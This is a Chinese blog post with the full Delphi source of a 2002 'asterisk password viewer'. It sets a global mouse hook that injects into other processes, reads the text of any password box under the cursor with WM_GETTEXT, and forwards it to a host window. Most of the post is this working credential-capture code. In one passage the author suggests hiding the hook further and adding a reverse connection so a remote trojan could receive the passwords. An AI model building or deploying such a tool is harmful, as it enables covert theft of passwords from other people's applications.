Windows文本框星号密码查看器

Windows文本框星号密码查看器

本人2002的学习作品

作者:成晓旭

1、  设计原理:注册一个系统级鼠标挂钩,通过监测系统鼠标所在Windows窗口来获取密码,成功获取密码之后,通过发送自定义的Windows系统消息,到宿主程序。

2、  Hook动态链接库设计原理:采用Windows Hook技术[鼠标挂钩],切入远程进程内部,并监测当前系统鼠标所在位置的当然窗口句柄(通过Windows APIWindowFromPoint()),获取窗口句柄之后,判断当然窗口是否为文本框,并进一步判断是否为密码框,当发现是密码输入框时,当此窗口发送WM_GETTEXT消息,获取密码。成功获取密码之后,发现自定义的WM_COPYDATA消息到宿主程序;

具体实现步骤简介:

1.  设置系统鼠标挂钩:

        hkMouseHook := SetWindowsHookEx(WH_MOUSE,@CXX_MouseHookProc,hInstance,0);

2.  注销系统鼠标挂钩:

        UnHookWindowsHookEx(hkMouseHook);

3.  监测当然窗口及窗口风格判断:

        MousePos := pMhs.pt;

    wnd := WindowFromPoint(pmhs.pt);

    style := GetWindowLong(wnd,GWL_STYLE);

    if (style and ES_PASSWORD) = ES_PASSWORD then

    begin

            //发现密码窗口

    end;

4.  向密码框获取密码串:

        SendMessage(wnd,WM_GETTEXT,256,Integer(@MouseTitle[0]));

5.  发送自定义消息到宿主程序:

              GetMem(pmi,sizeof(TMouseInfo));

        pmi.MouseX := pt.X;

        pmi.MouseY := pt.Y;

        pmi.MouseTitle := pwd;

        GetMem(pcds,sizeof(TCopyDataStruct));

        pcds.dwData := 9910;

        pcds.cbData := sizeof(TMouseInfo);

        pcds.lpData := pmi;

        SendMessage(hDec,WM_COPYDATA,0,LPARAM(pcds));

3、  宿主程序设计原理:我的宿主程序是自己学习Windows SDK开发时作品,采用纯SDK实现。SDK的编程不用废话了吧。在这个工具程序中,只需要在系统消息处理方法中,增加一个对WM_COPYDATA的拦截及处理过程就可能了。

case uMsg of

    WM_COPYDATA:

    begin

        CXX_ReceiveCopyData(uMsg);

    end;

        ……

end;

4、  应用技术提点:这个是本人在2002年学习Microsoft Windows SDK编程技术时的学习作品。当然,有兴趣的话,你完全可以将其Hook进一步进行隐藏,并为其增加“端口反弹”或者“半连接”功能,宿主程序可以是自己的远程XXXXXX,哈哈,这样发布出来的话,想知道的东西就多了……

5、 完整源码代码:

1.  Hook鼠标挂钩部分:

   

{
     产品名称:     Windows 密码工具[Window98
/NT/2000/XP]
     功能描述:     截取Windows密码编辑框中的密码串
                    采用纯粹的SDK开发
                    能捕捉windows98
/NT/2000/XP的密码框中的""密码
     开发平台:     Windows2000 
+ Delphi6 + MSDN + SDK
     开发者:       成晓旭
     版权所有:     成晓旭
     模块设计者:   成晓旭
     设计思路:     采用Windows Hook技术[鼠标挂钩],切入远程进程内部,
                    再发送WM_GETTEXT消息截取密码,最后用SendMessage发送
                    WM_COPYDATA消息自定义的密码信息结构体到目标窗口,以
                    显示或处理Hook DLL所截取的远程进程的密码.
     开始时间:     2002年3月4日
     完成时间:     2002年5月24日[最终实现]
     备    注:     此工具是本人在2002年开发的第二个软件
                    本工具在2000年6月份左右曾实现过一个Windows98下的
                    密码截取工具,两年以来,我一直没有放弃过实现Windows
                    操作系统下的所有密码的截取,如此,终于实现了两年以来
                    未曾实现的截取WindowsNT系列的密码.[
2002/05/24]
                    以后的路还很长:WindowNT系列的当前用户登录密码、
                    内存长驻的其它密码等等.
}

unit MouseHook;

interface
uses
    Messages,Windows;
// ,SysUtils;

var

    hkMouseHook:HHook;
    ProcSafelyExit:Pointer;
    uCXXMsg:UINT;
    procedure   DllEntryProc(ul_reason_for_call:DWORD);
    procedure   SetupHook(fSet:
boolean );stdcall;export;
    function    CXX_MouseHookProc(iCode:integer;wParam:WPARAM;lParam:LPARAM):LRESULT;stdcall;export;
    procedure   AutoUnInstallHook();far;

implementation

uses DataStruct;


procedure CXX_SendCopyData(pt:TPoint;pwd:TMTitle);
var
    pcds:PCopyDataStruct;
    pmi:PMouseInfo;
    hDec:THandle;
begin
    hDec:
= Findwindow(Nil, ' WM_COPYDATA接收端 ' );
    
if  hDec  =   0  then
    begin
        MessageBox(
0 , ' 数据接收窗口没有找到,程序拒绝发送WM_COPYDATA消息! ' , ' 提示 ' ,MB_OK or MB_ICONWARNING);
        Exit;
    end;
    
try
        GetMem(pmi,sizeof(TMouseInfo));
        pmi.MouseX :
=  pt.X;
        pmi.MouseY :
=  pt.Y;
        pmi.MouseTitle :
=  pwd;
        GetMem(pcds,sizeof(TCopyDataStruct));
        pcds.dwData :
=   9910 ;
        pcds.cbData :
=  sizeof(TMouseInfo);
        pcds.lpData :
=  pmi;
        SendMessage(hDec,WM_COPYDATA,
0 ,LPARAM(pcds));
        
// PostMessage(hDec,WM_COPYDATA,Handle,LPARAM(pcds));
     finally
        FreeMem(pmi);
        FreeMem(pcds);
    end;
end;

function CXX_MouseHookProc(iCode:integer;wParam:WPARAM;lParam:LPARAM):LRESULT;stdcall;export;
var
    pMhs:PMOUSEHOOKSTRUCT;
    wnd:HWND;
    style:LongInt;
    MousePos:TPoint;
    MouseTitle:TMTitle;
begin
    
if  iCode  =  HC_ACTION then
    begin
        FillChar(MouseTitle,
255 , 0 );
        pMhs :
=  PMOUSEHOOKSTRUCT(lParam);
        MousePos :
=  pMhs.pt;
        wnd :
=  WindowFromPoint(pmhs.pt);
        style :
=  GetWindowLong(wnd,GWL_STYLE);
        
if  (style and ES_PASSWORD)  =  ES_PASSWORD then
        begin
            SendMessage(wnd,WM_GETTEXT,
256 ,Integer(@MouseTitle[ 0 ]));
            
// 发送截取的信息[]
            CXX_SendCopyData(MousePos,MouseTitle);
        end;
    end;
    Result :
=  CallNextHookEx(hkMouseHook,iCode,wParam,lParam);
end;

procedure SetupHook(fSet:
boolean );stdcall;export;
begin
    
if  fSet then
    begin
        
if  hkMouseHook  <>   0  then Exit;
            hkMouseHook :
=  SetWindowsHookEx(WH_MOUSE,@CXX_MouseHookProc,hInstance, 0 );
        
// if hkMouseHook <> 0 then
        
//     MessageBox(0,'鼠标挂钩安装成功!!!','挂钩提示',MB_ICONINFORMATION or MB_OK)
        
// else
        
//     MessageBox(0,'鼠标挂钩安装失败!','挂钩提示',MB_ICONWARNING or MB_OK);
    end
    
else
    begin
       
if  hkMouseHook  <>   0  then
        begin
            UnHookWindowsHookEx(hkMouseHook);
            hkMouseHook :
=   0 ;
            
// if hkMouseHook = 0 then
            
//     MessageBox(0,'鼠标挂钩撤消成功!!!','挂钩提示',MB_ICONINFORMATION or MB_OK)
            
// else
            
//     MessageBox(0,'鼠标挂钩撤消失败!','挂钩提示',MB_ICONWARNING or MB_OK);
        end;
    end;
end;

procedure   DllEntryProc(ul_reason_for_call:DWORD);
begin
{
    
if ul_reason_for_call = DLL_PROCESS_ATTACH then
    begin
        MessageBox(
0,'DLL_PROCESS_ATTACH','MouseDll Hint',MB_OK or MB_ICONINFORMATION);
        
//uCXXMsg := RegisterWindowMessage(SELF_MESSAGE_NAME);

    end
    
else if ul_reason_for_call = DLL_PROCESS_DETACH then
    begin
        MessageBox(
0,'DLL_PROCESS_DETACH','MouseDll Hint',MB_OK or MB_ICONINFORMATION);
    end;
    }

end;

procedure AutoUnInstallHook();
begin
     
if  hkMouseHook  <>   0  then
          SetupHook(False);
     ExitProc :
=  ProcSafelyExit;
end;

end.









 

 

2.  宿主程序部分:

 

此程序中,还有关于Windows程序资源加载以及窗口背景绘制等技术的演示。

 

{
     产品名称:     Windows 密码工具
     功能描述:     截取Windows密码编辑框中的密码串
                    采用纯粹的SDK开发
     开发平台:     Windows2000 
+ Delphi6 + MSDN + SDK
     开发者:       成晓旭
     版权所有:     成晓旭
     模块设计者:   成晓旭
     开始时间:     2002年3月4日
     完成时间:     2002年3月4日
     修改时间1:    2002年3月4日
     备    注:     此工具是本人在2002年开发的第二个软件,
}


program MouseExe;
uses
  Windows,
  SysUtils,
  Messages,
  Tie_In_MHook in 
' Tie_In_MHook.pas ' ,
  DataStruct in 
' DataStruct.pas ' ;

{$R MouseExe.res}
const
    CXX_WND_CLASS 
=   ' DC_Password ' ;    // 主窗口类名
    CXX_WND_CAPTION  =   ' Window2000/XP 密码捕捉工具 ' ;
    CXX_PASSKEY 
=   ' chenxiaoxu ' ;
    MOUSE_MOVE_TIMER 
=  WM_USER  +   9910 ;
    SELF_MESSAGE_NAME 
=   ' CXX_Test_Window_Message ' ;
var
    hWndMain,               
// 程序主窗口句柄
    hBtnCheck,                // 程序发送按钮句柄
    hBtnClose,               // 程序关闭按钮句柄
    hStcPos,                // 鼠标位置提示
    hStcTitle,                // 窗口标题提示
    hEdtPos,                 // 鼠标当前位置
    hEdtTitle:                // 获取窗口标题
                LongWord;
    hInstMain:  integer;    
// 程序实例句柄
    hBGBmp :    HBITMAP;     // 主窗口背景图片句柄
    hCur:       HICON;
    uCXXMsg:    UINT;
procedure CXX_SendCopyData();
var
    pcds:PCopyDataStruct;
    pmi:PMouseInfo;
    hDec:THandle;
begin
    hDec:
= Findwindow(Nil, ' WM_COPYDATA接收端 ' );
    
if  hDec  =   0  then
    begin
        MessageBox(hWndMain,
' 数据接收窗口没有找到,程序拒绝发送WM_COPYDATA消息! ' , '

' ,MB_OK or MB_ICONWARNING);
        Exit;
    end;
    
// try
        GetMem(pmi,sizeof(TMouseInfo));
        pmi.MouseX :
=   10 ;
        pmi.MouseY :
=   50 ;
        pmi.MouseTitle :
=   ' chenxiaoxu ' ;
        GetMem(pcds,sizeof(TCopyDataStruct));
        pcds.dwData :
=   9910 ;
        pcds.cbData :
=  sizeof(TMouseInfo);
        pcds.lpData :
=  pmi;
        SendMessage(hDec,WM_COPYDATA,hWndMain,LPARAM(pcds));
        
// PostMessage(hDec,WM_COPYDATA,Handle,LPARAM(pcds));
    
// finally
        FreeMem(pmi);
        FreeMem(pcds);
    
// end;
end;
procedure CXX_ReceiveCopyData(Msg:TMessage);
var
    str:string;
begin
    str :
=  IntToStr(PMouseInfo(PCOPYDATASTRUCT(Msg.LParam) ^ .lpData) ^ .MouseX);
    str :
=  str  +  IntToStr(PMouseInfo(PCOPYDATASTRUCT(Msg.LParam) ^ .lpData) ^ .MouseY);
end;
// 绘制窗口位图背景函数
function CXX_DrawBGBitmap(fdc:HDC;fBitmap:HBitmap): boolean ;
var
    hdcMem:HDC;
    rect:TRect;
    bmp:Bitmap;
    x,y:integer;
begin
//     bmp := nil;
    Result : =  False;
    
// 主窗口背景图片尚未加载,不能绘制窗口背景
     if  fBitmap  =   0  then Exit;
    
// 获取绘图区域
    GetClientRect(hWndMain,rect);
    
// 创建兼容内存设备描述表
    hdcMem : =  CreateCompatibleDC(fdc);
    
if  hdcMem  =   0  then Exit;
    
// 设置位图对象
     if  (GetObject(fBitmap,sizeof(Bitmap),@bmp)  =   0 ) then Exit;
    
// 设置内存设备描述表内容
     if  NOT Boolean(SelectObject(hdcMem,fBitmap)) then Exit;
    
// 绘制窗口背景图片
    x : =   0 ;
    
while (x  <=  rect.Right - rect.Left)  do
    begin
        y :
=   0 ;
        
while (y  <=  rect.Bottom - rect.Top)  do
        begin
            BitBlt(fdc,x,y,bmp.bmWidth,bmp.bmHeight,hdcMem,
0 , 0 ,SRCCOPY);
            y :
=  y  +  bmp.bmHeight;
        end;
        x :
=  x  +  bmp.bmWidth;
    end;
    Result :
=  DeleteDC(hdcMem);
end;

{
 function CXX_SetWinCaption():设置窗口对象标题函数
 参数定义:
     hWnd:   窗口对象句柄
     pchText:窗口对象标题
}

procedure CXX_SetWinCaption(hWnd:hWND;pchText:PChar);
begin
    SendMessage(hWnd,WM_SETTEXT,
0 ,Integer(pchText));
    
// SetWindowText(hWnd,pchText);
end;
{
 function CXX_GetWinCaption():取得按钮标题函数
 参数定义:
     hWnd:   按钮句柄
     pchText:按钮标题
}

procedure CXX_GetWinCaption(hWnd:hWND;pchText:PChar);
begin
    SendMessage(hWnd,WM_GETTEXT,
255 ,Integer(pchText));
end;

procedure CXX_MouseMoveTimerProc(hWin:HWND;uMsg:UINT;idEvent:UINT;dwTime:DWORD);
begin
    
// MessageBox(hWin,'系统时间','提示',0);
end;

function CXX_SetProgramTimer(fSetTimer:
boolean ): boolean ;
begin
    Result :
=  False;
    
if  fSetTimer then
    begin
        
// if SetTimer(hWndMain,MOUSE_MOVE_TIMER,3000,@CXX_MouseMoveTimerProc) <> 0 then
         if  SetTimer(hWndMain,MOUSE_MOVE_TIMER, 100 ,nil)  <>   0  then
            Result :
=  True;
    end
    
else
    begin
        
if  KillTimer(hWndMain,MOUSE_MOVE_TIMER) then
            Result :
=  True;
    end;
end;
// 主窗口消息回调函数
// function CXX_MainWindowProc(hWnd,uMsg,wParam,lParam:DWord):LRESULT;stdcall;
function CXX_MainWindowProc(hWnd:DWord;uMsg:TMessage;wParam,lParam:DWord):LRESULT;stdcall;
var
//     pchPassword:PCHAR;
    dc :HDC;
    ps:PAINTSTRUCT;
begin
{
    
if uMsg = uCXXMsg then
    begin
        MessageBox(hWnd,
'自定义消息来了!!!','Hint',0);
        MessageBox(hWnd,PChar(lParam),
'消息内容',0);
    end;
    }

    
case  uMsg of
    WM_COPYDATA:
    begin
        
// MessageBox(hWndMain,'窗口接收WM_COPYDATA消息!','提示',MB_OK or MB_ICONWARNING);
        CXX_ReceiveCopyData(uMsg);
    end;
    WM_CREATE:
    begin
        uCXXMsg :
=  RegisterWindowMessage(SELF_MESSAGE_NAME);
    end;
    WM_RBUTTONDBLCLK:   
// $0206
        PostQuitMessage( 0 );
    WM_COMMAND:         
// $0111
    begin
        
if  lParam  =  hBtnClose  then
        begin
            
if  MessageBox(hWnd,PChar( ' 确定要退出【 ' + CXX_WND_CAPTION + ' 】吗? ' ), '

' ,MB_YESNO or MB_ICONQUESTION) = IDYES then
                PostQuitMessage( 0 );
        end
        
else   if  lParam  =  hBtnCheck then
        begin
            
// CXX_SetProgramTimer(True);
            
// PostMessage(HWND_BROADCAST,uCXXMsg,0,0);
            
// SetupHook(True);
            CXX_SendCopyData();
        end;
    end;
    WM_PAINT:
    begin
        dc :
=  BeginPaint(hWnd,ps);
           
if  NOT CXX_DrawBGBitmap(dc,hBGBmp) then
            MessageBox(hWnd,
' 绘制主窗口背景失败呢! ' , ' 提示 ' ,MB_OK or MB_ICONWARNING);
    end;
    WM_DESTROY:
    begin
         CXX_SetProgramTimer(
false );
         Halt;   
// $0002:
    end;
    end;    
// End of Case
    Result : =  DefWindowProc(hWnd,uMsg,wParam,lParam);
end;

// 应用程序实例化
function CXX_InitInstance(): boolean ;
var
    wndClass:TWndClass;
begin
    hInstMain :
=  hInstance;
    hCur :
=  LoadCursor(hInstMain, ' HANDLE ' );
    
if  hCur  =   0  then
        MessageBox(hWndMain,
' 加载主窗口背景图片失败!!! ' , ' 提示 ' ,MB_OK or 

MB_ICONWARNING)
    
else
        SetCursor(hCur);
    hBGBmp :
=  LoadBitmap(hInstMain, ' BACKBMP ' );
    
if  hBGBmp  =   0  then
        MessageBox(hWndMain,
' 加载主窗口背景图片失败!!! ' , ' 提示 ' ,MB_OK or 

MB_ICONWARNING);
    wndClass.cbClsExtra :
=   0 ;
    wndClass.cbWndExtra :
=   0 ;
    wndClass.hInstance :
=  hInstMain;
    wndClass.hIcon :
=   0 ;
    wndClass.hCursor :
=  LoadCursor( 0 ,IDC_HAND);
    wndClass.hbrBackground :
=  CTLCOLOR_EDIT;
    wndClass.lpfnWndProc :
=  @CXX_MainWindowProc;
    wndClass.lpszClassName :
=  CXX_WND_CLASS;
    wndClass.lpszMenuName :
=  nil;
    wndClass.style :
=  CS_DBLCLKS;
    Result :
=  Boolean(RegisterClassA(wndClass));
end;
// 主程序函数
procedure CXX_RunMainProgram();
var
    myMsg:TMsg;
begin
    
if  NOT CXX_InitInstance() then
        Exit;
    hWndMain :
=  CreateWindowEx(WS_EX_CLIENTEDGE or WS_EX_TOPMOST,
                        CXX_WND_CLASS,CXX_WND_CAPTION,
                        WS_VISIBLE or WS_SYSMENU or WS_MINIMIZEBOX,
                        
0 , 0 , 320 , 150 , 0 , 0 ,hInstMain,nil);
    hStcPos :
=  CreateWindowEx( 0 , ' static ' , ' 鼠标位置: ' ,
                        WS_VISIBLE OR WS_CHILD,
                        
5 , 10 , 80 , 20 ,
                        hWndMain,
0 ,hInstMain,nil);
    hEdtPos :
=  CreateWindowEx(WS_EX_CLIENTEDGE, ' Edit ' , '' ,
                        WS_VISIBLE OR WS_CHILD,
                        
100 , 10 , 200 , 20 ,
                        hWndMain,
0 ,hInstMain,nil);
    hStcTitle :
=  CreateWindowEx( 0 , ' static ' , ' 获取密码: ' ,
                        WS_VISIBLE OR WS_CHILD,
                        
5 , 50 , 80 , 20 ,
                        hWndMain,
0 ,hInstMain,nil);
    hEdtTitle :
=  CreateWindowEx(WS_EX_CLIENTEDGE, ' Edit ' , '' ,
                        WS_VISIBLE OR WS_CHILD,
                        
100 , 50 , 200 , 20 ,
                        hWndMain,
0 ,hInstMain,nil);
    hBtnCheck :
=  CreateWindowEx(WS_EX_STATICEDGE or WS_EX_CLIENTEDGE, ' Button ' , ' 发送消息 ' ,
                        WS_VISIBLE OR WS_CHILD,
                        
10 , 85 , 100 , 30 ,
                        hWndMain,
0 ,hInstMain,nil);
    hBtnClose :
=  CreateWindowEx(WS_EX_STATICEDGE or WS_EX_CLIENTEDGE, ' Button ' , ' 退出程序 ' ,
                        WS_VISIBLE OR WS_CHILD,
                        
180 , 85 , 100 , 30 ,
                        hWndMain,
0 ,hInstMain,nil);
    
// 主程序函数循环
     while (GetMessage(myMsg,hWndMain, 0 , 0 ))  do
    begin
        TranslateMessage(myMsg);
        DispatchMessage(myMsg);
    end;
end;

begin
    CXX_RunMainProgram();
end.

你可能感兴趣的:(windows,timer,Integer,工具,Delphi,hook)